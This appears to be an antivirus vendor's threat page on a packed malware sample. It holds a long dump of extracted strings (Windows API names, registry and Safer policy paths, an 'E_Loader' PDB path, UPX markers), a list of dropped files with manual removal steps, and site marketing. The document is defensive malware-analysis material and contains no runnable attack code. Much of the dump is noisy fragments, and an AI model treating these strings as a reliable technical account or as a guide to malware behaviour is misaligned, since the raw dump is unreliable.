TermsrvSetValueKey
tsappcmp.dll
Windows Setup
user32.dll
sndrec32.exe
soundrec.exe
packgr32.exe
packager.exe
mplay32.exe
mplayer.exe
mciole16.dll
mciole.dll
$Microsoft Root Certificate Authority
Windows 3.1 Migration
t%SVW)E
mpr.dll
Unable to locate init routine, error = %d
Unable to load client dll, error = %d
ldap_msgfree
1.2.840.113556.1.4.529
wldap32.dll
SamiChangePasswordUser2
SamiChangePasswordUser
SetProcessWindowStation
OpenWindowStationW
It.Iu
PSShL
t.Ht#Ht Ht
ShellExecuteExW
AccProvGetOperationResults
AccProvCancelOperation
WINREG: Frame %d = 0x%x
Frames %d
WINREG: Name: %S
WINREG: Unable to retrieve object name error 0x%x
WINREG: Tracked key data for object 0x%x
imagehlp.dll
SSSSSh
WINTRUST.dll
Secur32.dll
ntdll.dll
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
SetNamedPipeHandleState
GetProcessHeap
WaitNamedPipeW
NtQueryKey
NtEnumerateKey
RtlFormatCurrentUserKeyPath
NtNotifyChangeKey
NtDeleteValueKey
NtEnumerateValueKey
NtDeleteKey
NtQueryValueKey
NtSetValueKey
NtOpenKey
NtCreateKey
NtFlushKey
NtLoadKey
NtUnloadKey
NtReplaceKey
NtNotifyChangeMultipleKeys
NtQueryMultipleValueKey
NtRestoreKey
NtSaveKey
NtSaveMergedKeys
NtSaveKeyEx
advapi32.pdb
0p.yx
%x~O>
%D$#>
7,7<7\7}7
9#:*:@:{:
3 3%3.3=3
8$9(90949@9
1&2,263@3
:,:0:<:_:
3 3$303;3
3M4H4Z4`4e4
3"3'333<3
<"<)</<5<
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer
\Software\Policies\Microsoft\Windows\Safer
\UrlZones
%HKEY_CURRENT_USER
\PIPE\
NTMARTA.DLL
%SystemRoot%\
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%
%s\u
REG.DAT
Windows 3.1 Migration Status
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
t\\.\pipe\net\NtControlPipe
lX-X-X-XX-XXXXXX
\\.\WMIDataDevice
Software\Microsoft\Windows\CurrentVersion\Group Policy\Appmgmt
nuser32.dll
msi.dll
\PIPE\InitShutdown
.u
system.ini
reg.dat
%SystemRoot%\Debug\UserMode\appmgmt.log
%SystemRoot%\Debug\UserMode\appmgmt.bak
%HKEY_LOCAL_MACHINE
%s%s%d%s%s%s%s%s%s%s{lx-x-x-xx-xxxxxx}
certificate
%SystemRoot%\System32\Drivers\
\pipe\svcctl
Group%d
ncacn_ip_tcp
UrlZones
DisallowExecution
iphlpapi.dll
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
perfh004.dat
perfc004.dat
progman.ini
SoftWare\Microsoft\Windows NT\CurrentVersion\Program Manager\Settings
SoftWare\Microsoft\Windows NT\CurrentVersion\Program Manager\UNICODE Groups
Windows NT Network Provider
\\.\Pipe\TerminalServer\SystemExecSrvr\%d
W\winsta.dll
feclient.dll
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Compatibility\Applications\
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
samlib.dll
SupportUrl
Wshell32.dll
CEvents::Report called with more params then expected!
APPMGMT (%x.%x) d:d:d:d
appmgmts.dll
%s_%d
{x-x-x-xx-xxxxxx}
setupapi.dll
%ws\%u
\\.\%s
\Registry\Machine\Hardware\DeviceMap\Scsi\Scsi Port %d\Scsi Bus %d\Target ID %d\Logical Unit Id %d
\Device\Harddisk%d\Partition0
\\.\PhysicalDrive%d
W%s\%s
\Device\Video%d
DefaultSettings.YResolution
DefaultSettings.XResolution
DefaultSettings.VRefresh
DefaultSettings.BitsPerPel
HardwareInformation.BiosString
HardwareInformation.AdapterString
HardwareInformation.DacType
HardwareInformation.ChipType
HardwareInformation.MemorySize
SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3
PerfDbg.Etl
C:\perfdbg.etl
$winnt$.inf
Export
ncacn_nb_tcp
\PIPE\winreg
\SystemRoot\system32\perf0000.dat
\SystemRoot\system32\prf00000.dat
Advanced Windows 32 Base API
5.1.2600.5512 (xpsp.080413-2113)
advapi32.dll
Windows
Operating System
5.1.2600.5512
An exception occurred while performing Windows 3.1 migration. Some data
The entire contents of %1 was migrated into the Windows NT registry.
Windows NT registry.
the Windows NT registry.
The contents of the Windows 3.X Program Manager group file %1 was not
migrated into the Windows NT registry, as a group of that name, %2,
Contents of %1 migrated to the Windows NT registry.
Unable to migrate all or part of the %1 file into the Windows NT registry.
Unable to migrate all or part of the %1 section of %2 into the Windows
into the Windows NT registry.
Unable to load the contents of the Windows 3.1 Program Manager group file %1.
Error Code was %2. Group not migrated to the Windows NT registry.
Unable to convert the contents of the Windows 3.1 Program Manager group
file %1. into the Windows NT format. Error Code was %2. Group not
migrated to the Windows NT registry.
Unable to migrate all or part of %1 to the Windows NT registry.
the Windows NT registry. It is incompatible with Windows NT.
Allows programs to execute with only access to resources granted to open well-known groups, blocking access Administrator and Power User privileges, and personally granted rights.
Software cannot access certain resources, such as cryptographic keys and credentials, regardless of the access rights of the user.
Allows programs to execute as a user that does not have Administrator or Power User access rights, but can still access resouces accessible by normal users.

%original file name%.exe_1612_rwx_03990000_00001000:




.PR`WX

%original file name%.exe_1612_rwx_03A40000_00001000:




%8S^aZX

%original file name%.exe_1612_rwx_03A60000_00001000:




.faZX

%original file name%.exe_1612_rwx_03B10000_00001000:




1ZXZXZXhb(.IPR`

%original file name%.exe_1612_rwx_03BC0000_00001000:




.aP`PR

%original file name%.exe_1612_rwx_03E10000_00001000:




%XaZX

%original file name%.exe_1612_rwx_03EA0000_00001000:




%XaZX

%original file name%.exe_1612_rwx_03F80000_00001000:




s.Ya^`

%original file name%.exe_1612_rwx_04130000_00001000:




.zPR`PR
g~.zPRPR

%original file name%.exe_1612_rwx_04140000_00001000:




(r.zPR

%original file name%.exe_1612_rwx_04150000_00001000:




%XaZX

%original file name%.exe_1612_rwx_04420000_0003E000:




`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll

%original file name%.exe_1612_rwx_10000000_00018000:




`.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
C:\Users\BLACK\Desktop\E_Loader 1.0\Release\E_Loader.pdb
E_Loader.dll
c:\%original file name%.exe
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
kernel32.dll
mscoree.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
    3. 

  3. Delete the original Packed file.
    4. 

  4. Delete or disinfect the following files created/modified by the Packed:
    

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\user[1].htm (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\user[1].htm (380 bytes)
    %WinDir%\qfx86.sys (188 bytes)
    %Documents and Settings%\%current user%\Desktop\ÓÎÐÐ.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
Average: 1.7 (3 votes)












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2024 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now